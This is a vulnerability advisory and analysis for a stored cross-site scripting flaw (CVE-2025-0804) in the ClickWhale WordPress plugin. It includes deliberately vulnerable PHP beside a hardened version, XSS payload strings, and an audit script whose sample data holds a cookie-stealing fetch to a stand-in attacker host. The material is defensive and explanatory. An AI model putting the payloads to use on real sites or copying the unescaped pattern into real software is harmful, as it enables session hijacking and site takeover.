CVE-2025-0804 in ClickWhale
Summary
by MITRE • 01/29/2025
The ClickWhale – Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via link titles in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Analysis
by VulDB Data Team • 05/24/2025
CVE-2025-0804 affects the ClickWhale plugin for WordPress in all versions up to and including 2.4.1; this entry does not name the fixed release, so any version newer than 2.4.1 that addresses the issue should be installed. The plugin manages affiliate links and link pages, and the flaw is a stored cross-site scripting weakness in the link title: the title is accepted without adequate input sanitization and rendered without output escaping, so an authenticated user with the Contributor role or higher can store HTML and JavaScript in it. Because the value persists in the database, the script runs in the browser of every user who views a page on which that title is rendered, for as long as the entry remains.
Technically this is CWE-79 (Improper Neutralization of Input During Web Page Generation) in its stored variant: the payload is written to the server once and executes on every later view, rather than having to be delivered to each victim separately. An attacker creates or edits a link and places something like an img tag with an onerror handler, or a script element, in the title field; the plugin saves it verbatim and later echoes it into the page unescaped. The Contributor requirement matters for two reasons. Contributor is the lowest role that can author content and is routinely handed to guest writers and outside contractors, so obtaining such an account is a low bar. And although WordPress core strips script from a Contributor's post content because that role lacks the unfiltered_html capability, that kses filtering applies to post content, not to a plugin's own form fields, so the plugin had to sanitize the title itself and did not.
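The pattern behind a flaw of this kind, written out as an added example rather than ClickWhale's own code: the cw_demo_* function names and the cw_demo_title and cw_demo_target options are assumptions chosen for this illustration, and the snippet assumes WordPress is loaded (for instance as a must-use plugin) so that the update_option, sanitize_* and esc_* helpers exist.

```php
<?php
/*
 * Added illustration of the vulnerable pattern beside the hardened one.
 * Not ClickWhale code: the cw_demo_* names and the 'cw_demo_title' /
 * 'cw_demo_target' options are assumptions for this example. Assumes
 * WordPress is loaded (e.g. as a must-use plugin) so update_option(),
 * sanitize_text_field(), esc_html() and friends are available.
 */

/* ---- Vulnerable: raw in, raw out (the stored CWE-79 pattern) ------------ */

function cw_demo_save_vulnerable() {
    // No capability check, no nonce, no sanitization. A Contributor posting
    // title=<img src=x onerror=alert(document.domain)> stores it verbatim.
    update_option( 'cw_demo_title',  $_POST['title'] );
    update_option( 'cw_demo_target', $_POST['target'] );
}

function cw_demo_render_vulnerable() {
    $title  = get_option( 'cw_demo_title', '' );
    $target = get_option( 'cw_demo_target', '' );
    // Stored markup is concatenated straight into the DOM and runs in the
    // browser of every viewer, administrators included. A target of
    // javascript:... is accepted into href just as readily.
    echo '<a href="' . $target . '">' . $title . '</a>';
}

/* ---- Hardened: authorise, validate on input, escape per output context -- */

function cw_demo_save_safe() {
    // Gate the action explicitly. Core's kses filtering of post content does
    // not cover a plugin's own form fields, so the plugin must check itself.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // CSRF nonce; the form must emit it with wp_nonce_field( 'cw_demo_save' ).
    check_admin_referer( 'cw_demo_save' );

    // wp_unslash() undoes WordPress's added slashes; sanitize_text_field()
    // strips tags, null bytes and control characters from the title.
    $title = sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) );
    // esc_url_raw() keeps only allowed schemes for storage; javascript: yields ''.
    $target = esc_url_raw( wp_unslash( $_POST['target'] ?? '' ) );

    update_option( 'cw_demo_title',  $title );
    update_option( 'cw_demo_target', $target );
}

function cw_demo_render_safe() {
    $title  = get_option( 'cw_demo_title', '' );
    $target = get_option( 'cw_demo_target', '' );
    // Escaping is chosen by output context and not reused across contexts:
    // esc_url() for an href (it also rejects javascript:), esc_html() for a
    // text node. Input sanitization does not replace this step, nor vice versa.
    printf( '<a href="%s">%s</a>', esc_url( $target ), esc_html( $title ) );
}
```

The two halves are deliberately symmetrical: the fix is not one extra call but a check on every boundary the data crosses, namely who may submit it, whether the request is genuine, what is stored, and how it is emitted for each HTML context.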
Operationally, a script running inside another user's session can read what that user's page can read and do what that user can do: submit forms carrying the victim's nonces, change settings, create users, or send the victim to a phishing page. Cookie theft is the classic XSS outcome, but WordPress marks its authentication cookies HttpOnly, so the realistic path is acting with the victim's session rather than exporting it. When the viewer is an administrator, the attacker effectively obtains administrator capabilities without ever logging in as one, which is why a Contributor-level stored XSS is treated as a privilege-escalation path and not a nuisance. The persistence of the payload is what makes it dangerous: one injection keeps firing for every visitor until the stored title is cleaned, and on a site where several people share the link manager that can go unnoticed for a long time.
The exposure therefore extends from individual sessions to the installation itself, because actions the attacker's own role forbids can be performed through the browser of a higher-privileged viewer. In ATT&CK terms the execution is T1059.007 (Command and Scripting Interpreter: JavaScript); if the attacker has to lure a specific administrator to the rendered page, the delivery is T1566.002 (Spearphishing Link). Persistence here lives in the application database, not on any endpoint, so endpoint autostart techniques do not describe it. Mitigation, in order: update the plugin to a release newer than 2.4.1 that fixes the issue; review who holds Contributor or higher and remove accounts that do not need it; add a Content-Security-Policy as defense in depth, bearing in mind that the WordPress admin relies on inline scripts, so a strict policy usually has to be scoped to front-end pages; and watch the link-management screens for unexpected edits. Finally, audit the link titles already stored: anything containing a less-than sign, an on...= attribute or a javascript: URI deserves inspection, and a confirmed injection means treating the submitting account as compromised and reviewing what administrators did while the payload was live.
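An audit pass over stored titles of the kind the last paragraph calls for, as an added stand-alone PHP example that is not part of the advisory or of the plugin. The rows are constructed inline for the illustration; in a real run they would be read from wherever the plugin keeps its link titles, which this entry does not name.

```php
<?php
/*
 * Added audit helper, not part of the advisory or of ClickWhale. Run with
 * `php audit.php`. The $rows below are constructed for the example; in a
 * real audit they would come from the plugin's link storage (not named in
 * the advisory), e.g. via `wp db query` or a database export.
 */

/**
 * True when a stored title contains markup that would execute if the title
 * were echoed into a page unescaped. Entities are decoded first so that a
 * title stored as &lt;script&gt; (hoping a later decode step runs it) is
 * caught as well as one stored with the raw characters.
 */
function cw_audit_title_is_suspicious( string $title ): bool {
    $decoded  = html_entity_decode( $title, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    $patterns = array(
        '/<\/?[a-z]/i',               // start of an HTML tag; a bare "< 5" does not match
        '/\bon[a-z]+\s*=/i',          // inline handlers: onerror=, onload=, onmouseover= ...
        '/\bjavascript\s*:/i',        // javascript: URI, dangerous if the title is reused as an href
        '/\bdata\s*:\s*text\/html/i', // data:text/html URI
    );
    foreach ( $patterns as $re ) {
        if ( preg_match( $re, $decoded ) ) {
            return true;
        }
    }
    return false;
}

/** Return only the rows whose title looks injected, keyed by id, for review. */
function cw_audit_titles( array $rows ): array {
    $flagged = array();
    foreach ( $rows as $row ) {
        if ( cw_audit_title_is_suspicious( $row['title'] ) ) {
            $flagged[ $row['id'] ] = $row;
        }
    }
    return $flagged;
}

// Constructed sample rows, not real ClickWhale data.
$rows = array(
    array( 'id' => 1, 'author' => 'editor', 'title' => 'Spring sale 2025' ),
    array( 'id' => 2, 'author' => 'guest',  'title' => 'Deal <img src=x onerror=alert(document.domain)>' ),
    array( 'id' => 3, 'author' => 'guest',  'title' => '&lt;script&gt;fetch("https://attacker.example/?c="+document.cookie)&lt;/script&gt;' ),
    array( 'id' => 4, 'author' => 'guest',  'title' => 'Best rates: javascript:alert(1)' ),
    array( 'id' => 5, 'author' => 'editor', 'title' => 'Fish & chips < 5 dollars' ),
);

foreach ( cw_audit_titles( $rows ) as $id => $row ) {
    printf( "FLAGGED id=%d author=%s title=%s\n", $id, $row['author'], $row['title'] );
}
```

On the sample rows this flags ids 2, 3 and 4 and leaves the two legitimate titles alone; the fifth row is there to show that an ordinary less-than sign or ampersand is not a finding. The author column is the useful pivot once something is flagged, since every other row submitted by that account needs the same scrutiny.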